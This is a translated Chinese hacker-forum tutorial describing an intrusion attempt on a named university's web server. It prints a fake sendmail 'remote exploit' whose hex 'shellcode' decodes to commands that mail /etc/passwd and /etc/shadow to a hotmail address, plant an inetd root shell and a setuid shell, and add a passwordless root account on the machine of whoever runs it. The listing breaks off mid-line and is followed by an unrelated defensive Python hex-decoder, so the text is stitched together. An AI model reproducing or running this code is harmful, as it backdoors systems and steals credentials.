Author: 恶猫 E.S…  Source: Eviloctal Information Security Team (www.eviloctal.com)
Preface:
Thinking back, it has been exactly one year from the time I got to know 冰血 and joined Eviloctal as moderator of the Beginner board until now. Seeing Eviloctal thrive under 冰血's management and leadership, with the technical discussions on the forum reaching an ever higher level and members' original work coming ever closer to professional security quality, I am genuinely glad. But articles that look after the newbies' "Hacking" have become relatively scarce, so today I am writing one specifically for newbies. If you are already an old hand, there is no need to read it; it is tailored for beginners. The approach of this article borrows from 小路's "Hacker Defense: Dangers Outside the Host" (黑客防线---主机外部的危险); my thanks to 小路 for the selfless hacker spirit of sharing. OK, enough chatter, let's begin~~
Main text:
North China University of Technology (北方工业大学) is an engineering university in Beijing. I had once promised a friend of mine (not a girlfriend~~~) that I would try to take over her school's homepage before she graduated. Later I only did some simple footprinting of the school's website and found, to my surprise, that the host was running Sun OS, which made things somewhat harder. Since my skill at the time was limited and I had my own studies to attend to, I set the matter aside for a while. More than half a year later she brought it up again, and I decided to analyse it properly for her. So a friend of mine at that school, also in the same line of work, and I started testing the school. I scanned the site carefully with X-Scan and found that the host had ports 21, 25 and 80 open and no others. Then I checked whether the website had any script problems: to my dismay, every page was static, with no dynamic pages at all, which made the intrusion even harder. Fortunately, the host had port 25 open and the mail service was sendmail, and the X-Scan report showed that, because the sendmail version was too old, it was possibly remotely exploitable. So I quickly searched Google for a sendmail overflow program for Sun OS, and against the odds actually found one. The source code is as follows:
/*
###############################################################################
!!! PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE !!!
###############################################################################
~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
~|~ Sendmail <= 8.12.9 remote exploit ~|~
~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~_~
~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~ ~
by 0wN-U, ownu@ph4k3s.haxorznetwork.net
Exploit for new sendmail vulnerability - discovered again - by Michal Zalewski.
securityfocus link: http://www.securityfocus.com/archive/1/337839?
This exploit will work against sendmail <= 8.12.9 on Linux, *BSD and Solaris.
###>>> If everything is ok, you will find shell on target box, port 31337
NOTE: This exploit is very powerful, and only root can use it.
Have a nice time with this exploit ;-).
>>>>>>>>>>>> YOU SHOULD NOT HAVE THIS 0day SENDMAIL WAREZ!!!! <<<<<<<<<<<<<<<<
THIS IS VERY PRIVATE, DO NOT DISTRIBUTE!!!.
- props to l33tT(), r3t4rd, n0b0dy, gopulg-et and mebej (U-stupid-l4mer;-)
- drops to whitehats^H^H^H^Hsuckz ;-)))
###############################################################################
!!! PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE !!!
###############################################################################
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define SMTPPORT 25
/* improved tcp port (31337) bind shellcode */
char asmcode[]=
"\x65\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
"\x2d\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68"
"\x75\x6e\x3b\x65\x63\x68\x6f\x20\x24\x55\x53\x45\x52\x20\x24\x4f\x53"
"\x54\x59\x50\x45\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e"
"\x3b\x65\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e"
"\x70\x68\x75\x6e\x3b\x75\x6e\x61\x6d\x65\x20\x2d\x61\x20\x3e\x3e\x20"
"\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e\x3b\x65\x63\x68\x6f\x20\x22\x2d"
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x22"
"\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e\x3b\x69\x66\x63"
"\x6f\x6e\x66\x69\x67\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75"
"\x6e\x3b\x65\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x3e\x20\x69\x6e\x66\x6f"
"\x2e\x70\x68\x75\x6e\x3b\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x68\x6f"
"\x73\x74\x73\x20\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e"
"\x3b\x65\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
"\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e"
"\x70\x68\x75\x6e\x3b\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73"
"\x73\x77\x64\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e\x3b"
"\x65\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
"\x2d\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70"
"\x68\x75\x6e\x3b\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73\x68\x61\x64"
"\x6f\x77\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e\x3b\x65"
"\x63\x68\x6f\x20\x22\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
"\x2d\x2d\x2d\x2d\x2d\x22\x20\x3e\x3e\x20\x69\x6e\x66\x6f\x2e\x70\x68"
"\x75\x6e\x3b\x63\x61\x74\x20\x69\x6e\x66\x6f\x2e\x70\x68\x75\x6e\x20"
"\x7c\x20\x6d\x61\x69\x6c\x20\x68\x34\x78\x30\x72\x68\x34\x78\x33\x72"
"\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d\x3b\x65\x63\x68\x6f"
"\x20\x62\x67\x70\x20\x20\x73\x74\x72\x65\x61\x6d\x20\x20\x74\x63\x70"
"\x20\x20\x20\x20\x20\x6e\x6f\x77\x61\x69\x74\x20\x20\x72\x6f\x6f\x74"
"\x20\x20\x20\x20\x2f\x62\x69\x6e\x2f\x73\x68\x20\x2f\x62\x69\x6e\x2f"
"\x73\x68\x20\x2d\x69\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x69\x6e\x65"
"\x74\x64\x2e\x63\x6f\x6e\x66\x3b\x6b\x69\x6c\x6c\x61\x6c\x6c\x20\x2d"
"\x48\x55\x50\x20\x69\x6e\x65\x74\x64\x3b\x63\x70\x20\x2f\x62\x69\x6e"
"\x2f\x73\x68\x20\x2f\x74\x6d\x70\x2f\x2e\x67\x6f\x74\x69\x74\x2d\x24"
"\x55\x53\x45\x52\x3b\x63\x68\x6d\x6f\x64\x20\x34\x37\x37\x37\x20\x2f"
"\x74\x6d\x70\x2f\x2e\x67\x6f\x74\x69\x74\x2d\x24\x55\x53\x45\x52\x3b"
"\x65\x63\x68\x6f\x20\x30\x77\x6e\x75\x3a\x3a\x30\x3a\x30\x3a\x30\x77"
"\x6e\x75\x3a\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x20"
"\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x3b\x70\x77"
"\x63\x6f\x6e\x76\x3b";
/* byte-swap a 32-bit value on little-endian hosts, leave it alone on big-endian ones */
int rev(int a){
  int i=1;
  if((*(char*)&i)) return(a);
  return((a>>24)&0xff)|(((a>>16)&0xff)<<8)|(((a>>8)&0xff)<<16)|((a&0xff)<<24);
}
char msg[] = "0day HACKING w4r3z!!!";
int main(int argc,char **argv){
  struct hostent *hp;
  struct sockaddr_in adr;
  char buffer[1024],*b,*ls = asmcode;
  int count;
  int i,c,n,sck[2],fp,ptr6,jmp,cnt,ofs,flag=-1;

  printf ("-------------------------------------------------------\n");
  printf ("PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE\n");
  printf (" >>> SENDMAIL <= 8.12.9 REMOTE EXPLOIT by 0wN-U <<<\n");
  printf ("PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE PRIVATE\n");
  printf ("-------------------------------------------------------\n");

  /* refuses to run unless the user executes it as root */
  if (getuid() != 0)
  {
    printf ("Sorry!!!\n");
    printf ("This is very dangerous exploit for whole internet, and thats why only root users can use it!!!\n");
    printf ("Sorry kiddies :-))))\n");
    exit(0);
  }
  if(argc<2){
    printf("USAGE: %s address portnum type\n",argv[0]);
    printf("address
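Before compiling an "exploit" pulled from Google like the one above, it is worth looking at what its shellcode string actually contains. The Python script below is an added check, not part of the original article or of the exploit listing: it parses the hex escapes of a C string literal (also in the backslash-stripped form the listing above shows) and reports whether the bytes look like machine code or like plain text. Fed the first lines of the asmcode array above, it prints readable shell commands rather than binary code; the function names are my own.

```python
"""Check what a C "shellcode" string literal actually holds (added example).

Parses the hex escapes of a C string literal, tolerating the backslash-stripped
form ("x65x63...") seen in copied listings, and classifies the bytes: machine
code is mostly non-printable, while a blob that decodes to clean printable text
is a script in disguise and should be read, not run.
"""
import re
import string

# One escape token; the backslash is optional so that listings whose
# backslashes were lost in copy/paste still parse.
_ESCAPE = re.compile(r"\\?x([0-9a-fA-F]{2})")
PRINTABLE = frozenset(bytes(string.printable, "ascii"))


def decode_c_hex_literal(literal: str) -> bytes:
    """Turn the concatenated hex escapes of a C string literal into bytes."""
    return bytes(int(h, 16) for h in _ESCAPE.findall(literal))


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII (0.0 for empty input)."""
    if not data:
        return 0.0
    return sum(b in PRINTABLE for b in data) / len(data)


def classify(data: bytes, threshold: float = 0.95) -> str:
    """'text' when the bytes read as plain text, otherwise 'binary'."""
    return "text" if printable_ratio(data) >= threshold else "binary"


# Constructed sample: the first four lines of the asmcode array from the
# listing above, copied as printed there (backslashes already missing).
SAMPLE_LISTING = (
    "x65x63x68x6fx20x22x2dx2dx2dx2dx2dx2dx2dx2dx2dx2dx2d"
    "x2dx2dx2dx2dx2dx2dx22x20x3ex20x69x6ex66x6fx2ex70x68"
    "x75x6ex3bx65x63x68x6fx20x24x55x53x45x52x20x24x4fx53"
    "x54x59x50x45x20x3ex3ex20x69x6ex66x6fx2ex70x68x75x6e"
)
# Constructed sample of real machine-code bytes (an x86 function prologue
# plus filler) for comparison; written with proper backslashes.
SAMPLE_MACHINE_CODE = r"\x55\x89\xe5\x31\xc0\x90\xcd\x80\xeb\xfe"

if __name__ == "__main__":
    for name, lit in (("asmcode", SAMPLE_LISTING), ("prologue", SAMPLE_MACHINE_CODE)):
        data = decode_c_hex_literal(lit)
        print(f"{name}: {len(data)} bytes, {printable_ratio(data):.0%} printable"
              f" -> {classify(data)}")
        if classify(data) == "text":
            print("  decoded:", data.decode("ascii"))
```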